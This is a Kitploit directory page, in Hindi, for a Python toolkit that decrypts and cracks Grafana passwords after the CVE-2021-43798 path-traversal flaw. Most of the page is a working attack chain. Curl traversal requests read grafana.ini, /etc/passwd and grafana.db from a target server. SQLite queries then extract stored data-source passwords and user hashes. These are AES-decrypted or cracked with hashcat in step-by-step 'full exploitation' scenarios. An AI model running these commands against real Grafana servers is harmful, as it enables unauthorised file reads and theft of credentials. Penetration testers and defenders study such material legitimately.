Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Grafana-Password-Decryptor — Grafana डेटाबेस से AES-256 डिक्रिप्ट करने और PBKDF2 पासवर्ड क्रैक करने के लिए Python टूलकिट, जो आमतौर पर (CVE-2021-43798) के साथ जोड़ा जाता है। | Kitploit
उपकरण/GitHubGitHub/strikoder-premium/grafana-password-decryptor
पासवर्ड क्रैकिंगएन्क्रिप्शन/डिक्रिप्शन उपकरणभेद्यता विश्लेषणशोषणपोस्ट-शोषणक्रिप्टोग्राफी
GitHubstrikoder-premium/grafana-password-decryptor

Grafana-Password-Decryptor

Grafana डेटाबेस से AES-256 डिक्रिप्ट करने और PBKDF2 पासवर्ड क्रैक करने के लिए Python टूलकिट, जो आमतौर पर (CVE-2021-43798) के साथ जोड़ा जाता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
138 महीने पहलेअभी तक समीक्षित नहीं

ग्राफ़ाना पासवर्ड डिक्रिप्टर

ग्राफ़ाना पासवर्ड को कई प्रारूपों से डिक्रिप्ट और क्रैक करने के लिए पायथन टूलकिट।

कोड द्वारा: strikoder

यह टूल क्या करता है?

ग्राफ़ाना पासवर्ड स्टोरेज के दो प्रकार को संभालता है:

  • 🔐 AES-256 Base64 (data_source तालिका) → AESDecrypt.py से सीधे डिक्रिप्ट करें
  • 🔨 PBKDF2_HMAC_SHA256 (user तालिका) → grafana2hashcat.py से Hashcat के लिए रूपांतरित करें

CVE-2021-43798 पथ ट्रैवर्सल के बाद पोस्ट-एक्सप्लॉइटेशन के लिए उपयुक्त।

CVE-2021-43798 क्या है?

Grafana संस्करणों 8.0.0-beta1 से 8.3.0 में एक पथ ट्रैवर्सल भेद्यता जो बिना प्रमाणीकरण के हमलावरों को सर्वर से मनमानी फ़ाइलें पढ़ने की अनुमति देती है, जिनमें शामिल हैं:

  • कॉन्फ़िगरेशन फ़ाइलें (/etc/grafana/grafana.ini)
  • डेटाबेस फ़ाइलें (/var/lib/grafana/grafana.db)
  • सिस्टम फ़ाइलें (/etc/passwd)

शोषण उदाहरण:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is --output grafana.db

यह टूलकिट डेटाबेस से निकाले गए पासवर्ड को डिक्रिप्ट/क्रैक करके हमले की श्रृंखला को पूरा करता है।

शामिल उपकरण

1. AESDecrypt.py

data_source तालिका से AES-256 एन्क्रिप्टेड पासवर्ड को डिक्रिप्ट करता है।

आधारित: jas502n/Grafana-CVE-2021-43798 पर मुख्य सुधारों के साथ:

  • ✅ लचीली गुप्त कुंजी: कुंजी को मैन्युअल रूप से निकालें (कोई हार्डकोडेड पथ नहीं)
  • ✅ बैच प्रोसेसिंग: एक फ़ाइल से एकाधिक हैश डिक्रिप्ट करें
  • ✅ पूरी तरह से कॉन्फ़िगरेबल: CLI फ़्लैग के माध्यम से सभी पैरामीटर

2. grafana2hashcat.py

पासवर्ड क्रैकिंग के लिए user तालिका से Grafana PBKDF2_HMAC_SHA256 हैश को Hashcat-संगत प्रारूप में रूपांतरित करता है।

श्रेय: iamaldi/grafana2hashcat

स्थापना

root@kitploit:~
git clone https://github.com/strikoder/Grafana-Password-Decryptor.git
cd Grafana-Password-Decryptor
pip install cryptography #for Decyrption
chmod +x AESDecrypt.py grafana2hashcat.py

उपयोग

उपकरण 1: AESDecrypt.py (AES-256 Base64 पासवर्ड के लिए)

एकल हैश डिक्रिप्ट करें

root@kitploit:~
python3 AESDecrypt.py -hash R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

एकाधिक हैश डिक्रिप्ट करें

root@kitploit:~
python3 AESDecrypt.py -f hashes.txt

कस्टम गुप्त कुंजी का उपयोग करना

Grafana कॉन्फ़िग से गुप्त कुंजी निकालें:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' --path-as-is | grep secret_key

python3 AESDecrypt.py -hash [HASH] -k YOUR_SECRET_KEY

उपकरण 2: grafana2hashcat.py (PBKDF2 हैश के लिए)

एकल हैश फ़ाइल रूपांतरित करें

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt

इनपुट प्रारूप (grafana_hashes.txt):

root@kitploit:~
hash1,salt1
hash2,salt2
hash3,salt3

आउटपुट (Hashcat के लिए तैयार):

root@kitploit:~
sha256:10000:base64_salt:base64_hash

फ़ाइल में सहेजें

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

Hashcat से क्रैक करें

root@kitploit:~
hashcat -m 10900 hashcat_hashes.txt wordlist.txt

पूर्ण शोषण उदाहरण

परिदृश्य 1: AES-एन्क्रिप्टेड पासवर्ड (data_source तालिका)

root@kitploit:~
# 1. grafana.ini से गुप्त कुंजी निकालें (कुछ मामलों में खाली हो सकती है, उस स्थिति में पायथन प्रोग्राम में डिफ़ॉल्ट कुंजी का उपयोग करें)
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' \
  --path-as-is | grep secret_key

# 2. डेटाबेस डाउनलोड करें
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 3. data_source तालिका से AES-एन्क्रिप्टेड पासवर्ड निकालें
sqlite3 grafana.db "SELECT name, password FROM data_source;"

# 4. पासवर्ड को फ़ाइल में सहेजें (प्रति पंक्ति एक)
# उदाहरण: R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

# 5. निकाली गई गुप्त कुंजी से डिक्रिप्ट करें
python3 AESDecrypt.py -f passwords.txt -k [SECRET_KEY]

परिदृश्य 2: PBKDF2 हैश (user तालिका)

root@kitploit:~
# 0. डेटाबेस डाउनलोड करें
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 1. user तालिका से PBKDF2 पासवर्ड हैश निकालें
sqlite3 grafana.db "SELECT login, password, salt FROM user;"

# 2. grafana2hashcat के लिए हैश को फ़ॉर्मेट करें (hash,salt फ़ॉर्मेट)
# grafana_hashes.txt में उदाहरण फ़ॉर्मेट:
# 3ad31dc57a7452c442f259cfff7aa61f2a6cea88ee634724ae146e221ae4e01c56c8bcbb3552310acd2fd746a396d2f99bf8,pepper

# 3. Hashcat फ़ॉर्मेट में रूपांतरित करें
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

# 4. Hashcat से क्रैक करें (मोड 10900 = PBKDF2-HMAC-SHA256)
hashcat -m 10900 hashcat_hashes.txt rockyou.txt

त्वरित संदर्भ: कौन सा उपकरण उपयोग करें?

श्रेय

  • AESDecrypt.py: strikoder द्वारा कोडित, jas502n के Go कार्यान्वयन पर आधारित
  • grafana2hashcat.py: iamaldi द्वारा निर्मित

⭐ क्या यह उपयोगी लगा? इसे स्टार दें!

कोड द्वारा strikoder

टूल डाउनलोड करें
पासवर्ड प्रकारडेटाबेस तालिकाप्रारूपउपकरणHashcat मोड
AES-256 एन्क्रिप्टेडdata_sourceBase64 स्ट्रिंगAESDecrypt.pyN/A (सीधा डिक्रिप्ट)
PBKDF2_HMAC_SHA256userहेक्स हैश + सॉल्टgrafana2hashcat.py-m 10900